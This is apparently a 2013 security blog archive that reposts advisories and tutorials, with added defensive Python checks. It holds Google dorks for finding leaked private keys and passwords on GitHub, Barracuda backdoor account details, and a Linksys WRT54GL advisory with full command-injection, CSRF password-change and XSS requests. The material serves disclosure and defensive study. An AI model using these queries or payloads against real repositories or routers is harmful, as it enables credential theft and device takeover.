Jan 25, 2013

GitHub search exposes private SSH keys and other sensitive credentials.

After I read this news, I tried Google search for it and found some search strings that are useful in this case.


https://www.google.co.th/#hl=th&tbo=d&output=search&sclient=psy-ab&q=site:github.com+filetype%3Abash_history&oq=site:github.com+filetype%3Abash_history&gs_l=hp.3...844.844.0.1752.1.1.0.0.0.0.135.135.0j1.1.0...0.0...1c.1.PE2F9q66z4Q&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+content%3A%22BEGIN+RSA+PRIVATE+KEY%22&oq=site:github.com+content%3A%22BEGIN+RSA+PRIVATE+KEY%22&gs_l=hp.3...12992.25710.1.26078.23.23.0.0.0.0.225.2854.4j17j2.23.0...0.0...1c.1.SGhRDAkRATE&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+inurl%3A%22id_rsa%22&oq=site:github.com+inurl%3A%22id_rsa%22&gs_l=hp.3...94463.103374.3.103413.9.7.1.0.0.1.6580.7149.0j3j1j9-1.5.0...0.0...1c.1.i1n_l5P-b8U&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+content%3A%22password%22&oq=site:github.com+content%3A%22password%22&gs_l=hp.3...16004.20080.4.20287.18.17.0.0.0.0.263.2086.6j10j1.17.0...0.0...1c.1.ejvqzXxCd_w&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+filetype%3Apasswd&oq=site:github.com+filetype%3Apasswd&gs_l=hp.3...3884.4729.3.4890.6.6.0.0.0.0.170.595.1j4.5.0...0.0...1c.1.eeNsIxjFWdA&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661
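The defender's counterpart to these search strings is to catch such files before they are pushed. The following Python scanner is an added example, not code from the original post: it flags the artefacts the searches above look for (private key blocks, password assignments, risky file names such as id_rsa or .bash_history) over a constructed set of files, and reports only the finding type, never the secret itself. Hook it into a pre-commit check against your own repository.

```python
import re
from pathlib import PurePosixPath

# Artefacts the searches above look for: key blocks, credential assignments, risky file names.
PRIVATE_KEY_RE = re.compile(r"-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----")
PASSWORD_ASSIGN_RE = re.compile(r"(?i)(?:password|passwd|pwd)\s*[:=]\s*['\"]?[^\s'\"]{4,}")
RISKY_NAMES = {".bash_history", "id_rsa", "id_dsa", "passwd", "shadow", ".htpasswd"}

# Constructed sample repository (path -> content); the key material is fake.
SAMPLE_FILES = {
    "deploy/id_rsa": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIEconstructedSAMPLEkeyNOTREAL\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
    "config/settings.py": "DB_HOST = 'db.internal'\nDB_PASSWORD = 'hunter2hunter2'\n",
    "home/.bash_history": "ls\nmysql -u root -pS3cret\n",
    "README.md": "Set the password via the PASSWORD environment variable.\n",
}


def scan_file(path, content):
    """Return (path, line_number, finding) tuples; line 0 marks a file-name finding.

    Only the finding type is reported, never the matched text, so the report
    itself does not leak what it found.
    """
    findings = []
    if PurePosixPath(path).name in RISKY_NAMES:
        findings.append((path, 0, "risky filename"))
    for lineno, line in enumerate(content.splitlines(), 1):
        if PRIVATE_KEY_RE.search(line):
            findings.append((path, lineno, "private key block"))
        elif PASSWORD_ASSIGN_RE.search(line):
            findings.append((path, lineno, "password assignment"))
    return findings


def scan_tree(files):
    """Scan a mapping of path -> text and return all findings, ordered by path."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_file(path, files[path]))
    return findings


if __name__ == "__main__":
    for path, lineno, what in scan_tree(SAMPLE_FILES):
        where = f"{path}:{lineno}" if lineno else path
        print(f"{where}: {what}")
```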
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 24, 2013

R00tsec Blogspot On Facebook Page

Now I have created a page for feeding this blog into Facebook. If you want to see the links or the feed of this blog on Facebook.com, please 'like' this page (https://www.facebook.com/pages/R00tsecurity/477470155650211?ref=hl).


Critical SSH Backdoor in multiple Barracuda Networks

If you want to see full details, please go to the Source.

Vendor/product description:
-----------------------------
URL: https://www.barracudanetworks.com/products/

Vulnerability overview/description:
-----------------------------------
1) Backdoor accounts
Several undocumented operating system user accounts exist on the appliance.
They can be used to gain access to the appliance via the terminal but also
via SSH. (see 2)
These accounts are undocumented and can _not_ be disabled!
2) Remote access via SSH
An SSH daemon runs on the appliance, but network filtering (iptables) is used
to only allow access from whitelisted IP ranges (private and public).
The public ranges include servers run by Barracuda Networks Inc. but also
servers from other, unaffiliated entities - all of whom can access SSH on all
affected Barracuda Networks appliances exposed to the Internet.
The backdoor accounts from 1) can be used to gain shell access.
This functionality is entirely undocumented and can only be disabled via a
hidden 'expert options' dialog (see Workaround).

Proof of concept:
-----------------
URLs and other exploit code (passwords) have been removed from this advisory.
A detailed advisory will be released within a month including the omitted
information.

1) Backdoor accounts
The passwd and shadow files show that the following accounts exist.
Some passwords could be recovered (short attack with a tiny wordlist):
root:x:0:0:root:/root:/bin/bash <-- UID: 0!
<hash removed>
NOT CRACKED during given time (confirmed static in tested appliances)
build:x:0:0:Build User:/root:/boot/os_tools/clone_interactive.pl <-- UID: 0!
<hash removed>
NOT CRACKED during given time
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown -h now
<hash removed>
CRACKED <password removed>
product:x:700:100::/home/product:/bin/bash
<hash removed>
CRACKED <password removed>
ca:x:704:65534:ACL reset user:/home/ca:/home/emailswitch/code/firmware/current/bin/clear_acls.sh
<hash removed>
CRACKED <password removed>
support:x:705:705::/home/support:/home/product/code/firmware/current/bin/request_support.pl
<hash removed>
CRACKED <password removed>
websupport:x:706:706::/home/websupport:/home/emailswitch/code/firmware/current/bin/request_web.pl
<hash removed>
CRACKED <password removed>
qa_test:x:707:707::/home/qa_test:/root/qa_test1.pl
<hash removed>
NOT CRACKED during given time
The following users have public keys added to their authorized_keys
file:
remote:x:0:0:Remote Access:/home/remote:/bin/bash <-- UID: 0!
# cat /home/remote/.ssh/authorized_keys2
cluster:x:1000:1000::/home/cluster:/bin/bash
# cat /home/cluster/.ssh/authorized_keys2
At least the user "product" can be used to login and get a shell on the
appliance.
It was confirmed that this user can access the MySQL database (root@localhost
with no password), e.g. to add new users with administrative privileges to the
appliance configuration.
Furthermore it was possible to enable diagnostic/debugging functionality
which could be used to gain root access on the system. (confirmed in
Barracuda SSL VPN)

2) Remote access via SSH
An /etc/sysconfig/iptables file shows which rules are in place:
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*nat
:PREROUTING ACCEPT [4012:488438]
:POSTROUTING ACCEPT [641:40599]
:OUTPUT ACCEPT [641:40599]
COMMIT
# Completed on Thu Oct 9 16:39:19 2003
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*filter
:INPUT ACCEPT [42408:13197223]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [49685:7341128]
-A INPUT -s localhost -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j REJECT --reject-with icmp-port-unreachable
COMMIT
# Completed on Thu Oct 9 16:39:19 2003
Note:
The timestamp and the version of iptables-save suggest that these rules might
have been in place on Barracuda Networks appliances since 2003.
Users from these networks can access the SSH daemon running (by default on the
tested appliances) on port 22 e.g. by using the backdoor accounts:
* Private IP ranges
192.168.200.0/24
192.168.10.0/24
In some situations a user might be able to set his IP address (in the local
network) to one within the private ranges and then be allowed to access SSH.
* Public IP ranges
205.158.110.0/24
216.129.105.0/24
These ranges include some servers run by Barracuda Networks eg.
spam04.barracuda.com (216.129.105.22)
forum.barracudanetworks.com (216.129.105.38)
barracudacentral.org (216.129.105.40)
repsrv.barracuda.com (216.129.105.42)
mirror01.barracudacentral.com (216.129.105.94)
...
but also servers from other entities:
mail.totalpaas.com (205.158.110.135) - Domain registered by: Domains By Proxy, LLC ...
frmt1.boxitweb.com (205.158.110.132) - Domain registered by: Thor Myhrstad
static.medallia.com (205.158.110.229) - Domain registered by: Medallia Inc.
utility.connectify.net (205.158.110.171) - Domain registered by: Connectify Networks, Inc.
everest.address.com (216.129.105.202) - Domain registered by: WhitePages, Inc.
mail.tqm.bz (216.129.105.205) - Domain registered by: Total Quality Maintenance, Inc
outbound.andyforbes.com (216.129.105.212) - Domain registered by: HM hosting
...
More information about the hosts in these /24 networks can be found at:
http://cnet.robtex.com/205.158.110.html
http://cnet.robtex.com/216.129.105.html
A breach of any server in the whitelisted ranges enables an attack against all
affected Barracuda Networks appliances on the web.
Note:
The credentials from 1) (e.g. the "product" user) can be used to get a shell
on an appliance.



Source: http://archives.neohapsis.com/archives/fulldisclosure/2013-01/0221.html
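Checks a defender can run against an appliance, or any Linux host, for the two findings above, as an added example that is not part of the advisory: parse /etc/passwd for extra UID 0 accounts and for accounts with a real login shell, and parse iptables-save output for the source networks an ACCEPT rule admits to TCP 22, classifying which of them are public. The sample inputs are taken from the excerpts quoted above; the shell allow-list is an assumption.

```python
import ipaddress
import re

# Constructed samples, copied from the advisory excerpts above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
build:x:0:0:Build User:/root:/boot/os_tools/clone_interactive.pl
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown -h now
product:x:700:100::/home/product:/bin/bash
support:x:705:705::/home/support:/home/product/code/firmware/current/bin/request_support.pl
remote:x:0:0:Remote Access:/home/remote:/bin/bash
cluster:x:1000:1000::/home/cluster:/bin/bash
"""

SAMPLE_IPTABLES = """\
*filter
:INPUT ACCEPT [42408:13197223]
-A INPUT -s localhost -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j REJECT --reject-with icmp-port-unreachable
COMMIT
"""

# Assumed set of shells that give an interactive session.
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/bash"}


def parse_passwd(text):
    """Yield (name, uid, gid, shell) for every well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7:
            yield fields[0], int(fields[2]), int(fields[3]), fields[6]


def extra_uid0_accounts(text):
    """Accounts other than root that carry UID 0; each one is a second root."""
    return [name for name, uid, _, _ in parse_passwd(text) if uid == 0 and name != "root"]


def interactive_accounts(text):
    """Accounts whose login shell is a real shell and could take an SSH session."""
    return [name for name, _, _, shell in parse_passwd(text) if shell in INTERACTIVE_SHELLS]


# An INPUT rule with a source, a destination port and an ACCEPT target.
ACCEPT_RE = re.compile(r"^-A INPUT\s+-s\s+(\S+)\s.*--dport\s+(\d+)\b.*-j\s+ACCEPT$")


def ssh_allowed_sources(text, port=22):
    """Distinct sources that an INPUT ACCEPT rule admits to the given TCP port, in rule order."""
    seen = []
    for line in text.splitlines():
        m = ACCEPT_RE.match(line)
        if m and int(m.group(2)) == port and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def public_ssh_sources(text, port=22):
    """Whitelisted sources that are globally routable, in CIDR form; names such as localhost are skipped."""
    public = []
    for src in ssh_allowed_sources(text, port):
        try:
            net = ipaddress.ip_network(src, strict=False)  # accepts a.b.c.d/255.255.255.0 too
        except ValueError:
            continue
        if net.is_global:
            public.append(str(net))
    return public


if __name__ == "__main__":
    print("extra UID 0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("accounts with a shell:", interactive_accounts(SAMPLE_PASSWD))
    print("public networks allowed to SSH:", public_ssh_sources(SAMPLE_IPTABLES))
```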


Jan 23, 2013

Recon-ng - Reconnaissance Framework

Recon-ng

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, use the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.
 
Source: https://bitbucket.org/LaNMaSteR53/recon-ng



Howto: Secure SSH with Google Authenticator’s Two-Factor Authentication

If you want the full detail, please go to the Source.

1. Install Google Authenticator
- sudo apt-get install libpam-google-authenticator

2. Create an Authentication Key
- google-authenticator

3. Enter the secret key in the Google Authenticator app on your phone

4. Activate Google Authenticator
- sudo nano /etc/pam.d/sshd
- Add auth required pam_google_authenticator.so

5. Edit /etc/ssh/sshd_config
- ChallengeResponseAuthentication yes

6. Restart SSH
- sudo service ssh restart   
 

Source: http://www.howtogeek.com/121650/how-to-secure-ssh-with-google-authenticators-two-factor-authentication/


Checks whether a site is blocked by the Great Firewall of China.

Checks whether a site is blocked by the Great Firewall of China. This test checks across a number of servers from various locations in mainland China to determine if access to the site provided is possible from behind the Great Firewall of China.

This test checks for symptoms of DNS poisoning, one of the more common methods used by the Chinese government to block access to websites.

Top 10 tested domains:
1. facebook.com
2. wikileaks.ch
3. youtube.com
4. twitter.com
5. google.com
6. gmail.com
7. cnn.com
8. wikipedia.org
9. dropbox.com
10. yahoo.com
 

Source: http://viewdns.info/chinesefirewall/?domain=github.com




IronWasp on Linux

IRONWASP : (from ironwasp.org)
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

Source: http://blog.anantshri.info/ironwasp-on-linux/



DNSChef 0.2 - DNS proxy (aka "Fake DNS")

DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.

How to set it up and test it: http://thesprawl.org/projects/dnschef/

Source: http://packetstormsecurity.com/files/119676/DNSChef-0.2.html


Howto: Pulling Memory off an Android Device

After you have the JDK installed, I would recommend making a new directory in your home directory

$ mkdir android

We will need the Android adb tool. If you're on a Debian-based machine you can likely grab it like so

sudo apt-get install android-tools-adb

(Alternatively, you can download the Android SDK located here. The adb tool is located in sdk/platform-tools.)

Now we need to download the arm-eabi tool here

Note:
The arm-eabi tool is also inside the Android NDK, but the NDK contains a lot of tools we won't be using, so why not just download this tool by itself.

Move the arm-eabi tar to your android directory then run the following

$ tar -xvf arm-eCross-eabi-2011-02-02.tar.gz

Let's make our lives a lot easier and add our new tool to our path

export PATH=$PATH:/home/<your_username>/android/arm-eCross-eabi/bin

Note: If you close your terminal you will have to run the above command again

Now an annoying part. We have to find our device's open source code online. Odds are your manufacturer has released it. Just Google for it. I'm using the Droid Charge in this case, so I'll just Google "droid charge opensource code", which brings me to Samsung's website where they host the code.

I download the code and move it to my android folder. Then I'll make a folder called device_source.

$ mkdir device_source
$ mv SCH-I510_OpenSource.zip device_source
$ cd device_source
$ unzip SCH-I510_OpenSource.zip

The zip contains multiple compressed files, one of which is called SCH-I510_Kernel.tar.gz.
This one is the only one I need, as it contains the source code for my kernel.

$ tar -xvf SCH-I510_Kernel.tar.gz

So I now have my Kernel source folder in the following directory

~/android/device_source/Kernel

Note that yours might be different. Just look for a folder called Kernel. It will probably exist somewhere.

One last thing to download, and that is LiME. LiME is a kernel module we will compile to pull memory. Download it here.

Move it to your android folder, make a dir for it, then untar it.

$ mkdir lime
$ mv lime-forensics-1.1-r14.tar.gz lime
$ tar -xvf lime-forensics-1.1-r14.tar.gz

You should now have a directory called src. Great!

Now for the fun part!

We use the tool adb to interact with our android device. Make sure your rooted android device is plugged in to your computer via usb with debug mode enabled.  (Look for it. Something like settings>applications>developer>enable debugging mode)

Go into your Kernel directory for your phone source code that you unzipped

$ cd ~/android/device_source/Kernel

First we pull the kernel config using our adb tool. adb will need to open a port, so run it as sudo.

$ sudo adb pull /proc/config.gz

You should get something similar to
151 KB/s (13434 bytes in 0.086s)

Now we unzip it and rename and change it to a hidden file. (The compiler will be looking for this)

$ gunzip config.gz
$ mv config .config

Now we prepare the kernel source for our Mod. If you've been following this tutorial, the following command should work for you

$ make ARCH=arm CROSS_COMPILE=arm-eCross-eabi- modules_prepare

The compiler might throw a few complaints. So long as it doesn't tell you arm-eCross-eabi- is missing you should be good.  You will be prompted for y/n a few times. Just keep pressing enter until it's finished.

Now we must prepare the module for compilation.  Go into your lime src directory

$ cd ~/android/lime/src

Copy this into your Makefile. If you've followed this tutorial this should work. I had to tweak it a bit, but it's what worked for me.


obj-m := lime.o
lime-objs := tcp.o disk.o main.o

# KDIR must point at the kernel tree you ran modules_prepare in (the shell expands ~ in the recipe)
KDIR := ~/android/device_source/Kernel

# KVER is the host's kernel version, not the phone's; it is only used to name the output file
KVER := $(shell uname -r)

PWD := $(shell pwd)

default:
# cross-compile the module against the phone's kernel tree
	$(MAKE) ARCH=arm CROSS_COMPILE=arm-eCross-eabi- -C $(KDIR) M=$(PWD) modules
# the host strip does not understand the ARM module; if it fails, make stops here and lime.ko is left in place
	strip --strip-unneeded lime.ko
	mv lime.ko lime-$(KVER).ko

	$(MAKE) tidy

tidy:
	rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
	rm -rf \.tmp_versions

clean:
	$(MAKE) tidy
	rm -f *.ko

Up at the top make sure KDIR points to your Kernel source directory

and then type

$ make


And that ought to do it! You still might get some errors, including one that says

"strip: Unable to recognise the format of the input file `lime.ko'"

You should be fine. Just do an "ls" and make sure the file lime.ko was created.

Now for the final steps. Let's take the new kernel module we built and push it to our Android device. This part is pretty much right out of the documentation.

$ sudo adb push lime.ko /sdcard/lime.ko

We will transfer over netcat and usb. Yes, I realize this is a confusing statement

Lets set up a port with adb

$ adb forward tcp:4444 tcp:4444

Now we will interact with our device's shell over adb

$ adb shell

Login as root

# su

and run our kernel module. We will use the lime format as the memory format. (Volatility will support this in the future.)

# cd /sdcard
# insmod lime.ko "path=tcp:4444 format=lime"

Your terminal will now hang. adb will not start transferring the file until it has something to transfer to. Let's connect with netcat on our machine. Open a new terminal and type

$ nc 127.0.0.1 4444 > memory.lime

Wait a few minutes, depending on how much memory your phone has, and bingo! You should now have a file called memory.lime on your system. Run strings over it, mess with it, do whatever you want! Here is something you should note, however:

If you want to take memory off this phone again you need to remove our kernel module. Otherwise it will not work again (from my experience). It also may free up some space.

$ lsmod

Will show you that your module is running. To kill it type

$ rmmod lime

A big thank you to the guys who designed Lime. This tool is a beast and useful for more than just android.
Happy memory imaging!


Source:  http://thelulzkittens.blogspot.com/2013/01/pulling-memory-off-android-device.html
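The tutorial chooses format=lime for the dump. The following Python parser is an added example, not part of the original post or of the LiME project: it walks the 32-byte range headers of such a file (magic, version, inclusive start and end address, reserved bytes) and maps a physical address to its offset in memory.lime, so you can see which physical ranges a capture actually contains before handing it to another tool. It is run here over a constructed two-range image rather than a real capture.

```python
import struct
from io import BytesIO

# LiME range header, 32 bytes, little-endian: magic, version, start, end (inclusive), reserved
LIME_MAGIC = 0x4C694D45          # appears as the bytes b"EMiL" at the start of the file
LIME_HEADER = struct.Struct("<IIQQ8s")


def parse_lime_ranges(fp):
    """Walk a file opened in 'rb' mode and return (start, end, data_offset, size) per range."""
    ranges = []
    while True:
        raw = fp.read(LIME_HEADER.size)
        if not raw:
            break
        if len(raw) != LIME_HEADER.size:
            raise ValueError("truncated range header")
        magic, version, s_addr, e_addr, _ = LIME_HEADER.unpack(raw)
        if magic != LIME_MAGIC:
            raise ValueError(f"bad magic 0x{magic:08x} at offset {fp.tell() - LIME_HEADER.size}")
        if version != 1:
            raise ValueError(f"unsupported LiME version {version}")
        size = e_addr - s_addr + 1        # e_addr is the last byte of the range
        ranges.append((s_addr, e_addr, fp.tell(), size))
        fp.seek(size, 1)                  # skip the range body; the next header follows it
    return ranges


def parse_lime_bytes(data):
    """Convenience wrapper for an in-memory image."""
    return parse_lime_ranges(BytesIO(data))


def phys_to_offset(ranges, paddr):
    """Map a physical address to its file offset, or None if it falls in a hole between ranges."""
    for s_addr, e_addr, data_off, _ in ranges:
        if s_addr <= paddr <= e_addr:
            return data_off + (paddr - s_addr)
    return None


def build_sample_image():
    """Constructed two-range image standing in for memory.lime; not a real capture."""
    body1, body2 = b"A" * 64, b"B" * 32
    out = LIME_HEADER.pack(LIME_MAGIC, 1, 0x1000, 0x1000 + len(body1) - 1, b"\0" * 8) + body1
    out += LIME_HEADER.pack(LIME_MAGIC, 1, 0x8000, 0x8000 + len(body2) - 1, b"\0" * 8) + body2
    return out


if __name__ == "__main__":
    for s_addr, e_addr, off, size in parse_lime_bytes(build_sample_image()):
        print(f"range 0x{s_addr:x}-0x{e_addr:x} ({size} bytes) at file offset {off}")
```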


Howto: Install Metasploit From Github

1. Install git
- apt-get install git
2. Clone the source
- git clone git://github.com/rapid7/metasploit-framework.git
3. If you want to update use git pull

Source: http://www.darkoperator.com/blog/2011/11/9/metasploit-changes-to-git.html




Linksys WRT54GL v1.1 XSS / OS Command Injection

Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Dorks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device, or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is placed permanently into the configuration, so it gets executed on every boot of the device.

* Changing the password does not require the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one; the attacker is also able to activate remote management:

http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> "Richtliniennamen eingeben" (Enter Policy Name; place the XSS) -> "Zusammenfassung" (Summary; the script code gets executed))

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

